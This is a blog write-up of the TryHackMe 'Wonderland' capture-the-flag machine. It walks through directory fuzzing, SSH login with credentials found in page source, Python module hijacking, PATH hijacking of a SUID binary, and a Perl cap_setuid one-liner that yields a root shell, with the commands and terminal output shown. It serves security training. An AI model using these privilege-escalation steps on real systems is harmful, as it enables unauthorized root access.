Wonderland Writeup (TryHackMe Medium Machine)

-

Fall down the rabbit hole, enter wonderland and capture the flags.


Overview

Wonderland is a medium Linux machine from TryHackMe. This is a box with Alice in Wonderland theme, including multiple references to the movie.

It starts with a little puzzle, where we have to fuzz ourselves through the directories to certain page which contains credentials. We use those to SSH into the machine.

Once inside, we start to pivot to other users. We find a Python script, which imports certain “random” library. We create this file ourselves with malicious script inside which the script executes.

Next, we find another script which calls another global variable. We overwrite this variable by modifying the PATH variable, causing it to load our custom malicious code first.

We end the journey by abusing capabilities of Perl binary, grating us the ultimate root shell.


Nmap scan

Starting with Nmap scan.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -A 10.10.218.104 -T5
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-28 07:01 EDT
Nmap scan report for 10.10.218.104
Host is up (0.057s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3306/tcp)
HOP RTT      ADDRESS
1   50.65 ms 10.9.0.1
2   50.91 ms 10.10.218.104

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.98 seconds

The Nmap scan showed that 2 ports are open. Port 22 for SSH and port 80 for Golang HTTP server. Next, I moved on to the website titled “Follow the white rabbit”.


Website exploration & finding password for “alice”

I visited the website and I was greeted with the White Rabbit himself. It seemed like this site tells a story and I have to come all the way to the end. I checked the entire page but found nothing.


I ran Gobuster to enumerate directories and got a few results back.

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u "http://10.10.218.104" -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 64 -r 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.218.104
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 200) [Size: 153]
/r                    (Status: 200) [Size: 258]
/poem                 (Status: 200) [Size: 1565]

I looked at all the directories. Directory “/img” contained couple images from the story, “/poem” had a poem about Jabberwock on it and “/r” looked like the next part of the story.

I re-ran Gobuster here and got back new directory “/a”. It looked very similar compared to the last one, but with different line from the conversation between Alice and Cat.

I repeated the process all the way to “/r/a/b/b/i/t” with an invitation to Alice’s Wonderland.

Fun Fact: If you try to extract hidden messages from images found under “/img” with Steghide, one of them will give you hint “follow the r a b b i t”.

Another Gobuster scan showed nothing back. After that, I checked the source code and found pair of credentials for potential user “alice”.

credentials for user “alice” found in the source code

I tried to SSH into the machine with those credentials. And it was a success.


Gaining access via SSH & pivoting to user “rabbit”

I checked my user’s home directory and found the root flag, which I couldn’t read. There was also a Python script that generated 10 random lines from another poem about walrus and the carpenter.

alice@wonderland:~$ ls -la
total 40
drwxr-xr-x 5 alice alice 4096 May 25  2020 .
drwxr-xr-x 6 root  root  4096 May 25  2020 ..
lrwxrwxrwx 1 root  root     9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice  220 May 25  2020 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25  2020 .bashrc
drwx------ 2 alice alice 4096 May 25  2020 .cache
drwx------ 3 alice alice 4096 May 25  2020 .gnupg
drwxrwxr-x 3 alice alice 4096 May 25  2020 .local
-rw-r--r-- 1 alice alice  807 May 25  2020 .profile
-rw------- 1 root  root    66 May 25  2020 root.txt
-rw-r--r-- 1 root  root  3577 May 25  2020 walrus_and_the_carpenter.py

I went down my usual checklist of privilege escalation techniques like checking sudo permissions, SUID binaries, environment variables, cronjobs and so on, but I couldn’t find anything helpful.


After some time, I went back to the Python script and looked at it’s source code once again. The very first line was “import random”, which I completely overlooked the first time. I checked my sudo permissions again and I could run this walruscarpenter script as user “rabbit”.

alice@wonderland:~$ cat walrus_and_the_carpenter.py 
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.
==================================
     [POEM CONTINUES]
==================================
alice@wonderland:~$ sudo -l
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py


Since this “random” library was nowhere to be found, I could create my own “random.py”, which would spawn a shell as user “rabbit” when loaded. And it worked perfectly.

alice@wonderland:~$ cat random.py 
import os
os.system("/bin/bash")
alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$ whoami
rabbit
rabbit@wonderland:~$ id
uid=1002(rabbit) gid=1002(rabbit) groups=1002(rabbit)
rabbit@wonderland:~$


Pivoting to user “hatter”

I navigated to my user’s home directory and listed the files present there.

There was an interesting ELF file with SUID bit set named “teaParty”. I ran it to see what it does. The program mentioned Mad Hatter, who could be another user on this machine “hatter”.

rabbit@wonderland:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Fri, 28 Mar 2025 14:57:58 +0000
Ask very nicely, and I will give you some tea while you wait for him
please
Segmentation fault (core dumped)

It said that Mad Hatter will be here by some time. I checked the date on the machine. The difference was always a whole hour, which is way too long.

rabbit@wonderland:/home/rabbit$ date
Fri Mar 28 13:58:19 UTC 2025


So, I copied the binary to my machine for closer inspection. I used built-in Python3 HTTP server.

I booted Ghidra, which is an interactive disassembler (with decompiler) for static binary analysis, used a lot in reverse engineering, free alternative to IDA. Ghidra disassembled and decompiled the binary and wrote me a pseudo-code based off of the assembly.

Ghidra’s decompiled pseudo-code; we can see “date” variable being used

We can see here that the program grabs variable “date” to set the time. Idea sparked in my mind. Maybe it’s the same as last time. We need to overwrite whatever the program grabs as “date” and spawn a shell as user “hatter” with it.


I created a file called “date” in “/tmp” directory. Inside the file, I wrote two lines of Bash code to spawn a shell. Don’t forget to mark it as executable.

rabbit@wonderland:/tmp$ chmod +x date
rabbit@wonderland:/tmp$ cat date
#!/bin/bash
/bin/bash
rabbit@wonderland:/tmp$

Next, I appended path “/tmp” to the beginning of environment variable “PATH”. “PATH” variable stores all the paths where binaries are stored, to remove the need to type the absolute path each time you run the binary. By placing our path at the start, we ensure it gets preferred.

rabbit@wonderland:/tmp$ cd /home/rabbit
rabbit@wonderland:/home/rabbit$ export PATH="/tmp:$PATH"
rabbit@wonderland:/home/rabbit$ $PATH
bash: /tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin: No such file or directory
rabbit@wonderland:/home/rabbit$

All left to do was to just run the “teaParty” binary. And we got the shell as “hatter”.

rabbit@wonderland:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ whoami
hatter
hatter@wonderland:/home/rabbit$


Exploiting Perl capabilities & getting both user flag and root flag

Friendly reminder: There is a file with a password in “hatter’s” home directory, serving as a checkpoint for us (we don’t have to redo all the pivoting again, we can just login).

I ran down my usual checklist of privilege escalation techniques and stumbled upon very interesting result while checking the binary capabilities.

hatter@wonderland:~$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

We can see that the binary “/usr/bin/perl” has a “cap_setuid+ep” capability, which means it can change it’s UID (User Identifier) to any user. Even “root” user in this case.

Perl is a high-level, general-purpose programming language known for its powerful text-processing capabilities. It was originally developed as a Unix scripting language for report processing but has since evolved into a versatile language used for system administration, web development, network programming, and more. (ChatGPT)

In Linux, capabilities are a security feature that allows fine-grained control over privileged operations. Instead of giving a process full root access, capabilities allow granting only the necessary privileges. (ChatGPT)


With help of ChatGPT, I was able to exploit this. You can also use GTFObins thou.

We can abuse Perl’s capability here. Firstly, we set our UID to 0, which always represents “root”. Secondly, we invoke “/bin/bash” to give ourselves a shell.

ChatGPT spitting out our exploit
hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); setuid(0); exec "/bin/bash";'
root@wonderland:~# cd /root
root@wonderland:/root# ls -la
total 28
drwx--x--x  4 root root 4096 May 25  2020 .
drwxr-xr-x 23 root root 4096 May 25  2020 ..
lrwxrwxrwx  1 root root    9 May 25  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4096 May 25  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 May 25  2020 .ssh
-rw-r--r--  1 root root   32 May 25  2020 user.txt

There was the user flag in the “/root” directory. If you remember, the root flag was in Alice’s home directory and now we can read it. Flags switched places it seems. It’s all upside down.


Summary

Wonderland is a medium machine from TryHackMe. The box starts with website with a simple puzzle where we have to do some directory fuzzing. After completing it, we get our first credentials and we can SSH into the machine. Once we get in, there are multiple vulnerabilities from various Linux fields waiting for us. This includes tricking the binary to import and execute our malicious piece of code, changing a global variable, modifying the “PATH” environment variable and abusing Perl capabilities to get a root shell. During that, we pivot between multiple users. Although this machine has a Alice in Wonderland theme and simple puzzles, it still tackles vulnerabilities which you can see in the real world as well. I liked this box a lot. It’s a good not-that-serious hacking challenge. Recommending to anybody who needs rest from all the serious machines.

Comments

Post a Comment

Popular posts from this blog

Hospital Writeup (HackTheBox Medium Machine)

-
Image
Overview Hospital is a medium Windows machine from HackTheBox. This box makes you go against file upload, kernel exploits, database dumping, command injection and keylogging. We start with bypassing file upload restrictions, while evading functions disabled by PHP config. Once we get the shell on Linux container, we dump the database and discover an exploit for unpatched Linux kernel. The exploit gives us a root shell. Next, we crack the hash and use the password to log into Roundcube Webmail. We then abuse the command injection in EPS files and in GhostScript to get shell as another user with higher privileges. We then notice another session running under our user. We use Metasploit’s Meterpreter to migrate to process which runs on that second session and use Meterpreter’s additional functionality to make a screenshot of the desktop and capture keystrokes from that session. Since the user was logging into Webmail as Administrator, we captured his password in the process.
Read more

Bucket Writeup (HackTheBox Medium Machine)

-
Image
Overview Bucket is a medium Linux machine from HackTheBox. This box introduces you to Cloud hacking (kinda) and lets you play with S3 bucket from AWS, showcasing common misconfigurations. We start with discovering special subdomain, which represents an exposed S3 bucket with files used by the web server. After enumeration with “aws” utility, we find out that we can download and upload files. So we upload PHP reverse shell and get initial foothold. Once in, we dump the exposed DynamoDB database and get the credentials for user “roy”, getting the user flag afterwards. Next, we discover several internal services running. We find the source code in Roy’s project files and discover SSRF vulnerability, which leads to arbitrary file read, allowing us to read any file on the machine, including the root flag.
Read more

Mr Robot Writeup (Vulnhub Intermediate Machine)

-
Image
Based on the show, Mr. Robot. This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find. The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate. Overview Mr. Robot is a beginner-intermediate Linux machine from Vulnhub. It’s based on the show Mr. Robot and has some cool references to it. We start with enumeration of a Wordpress website. We discover an exposed login page and encoded credentials. Once we get into dashboard, we modify a template and gain remote access. Next, we compromise another user by cracking his hash and getting his password. We discover that Nmap has SUID bit set on the machine, which is very insecure because of Nmap’s functionality. We get 3 flags along the way: 1. on special website page, 2. as user flag and 3. as root flag.
Read more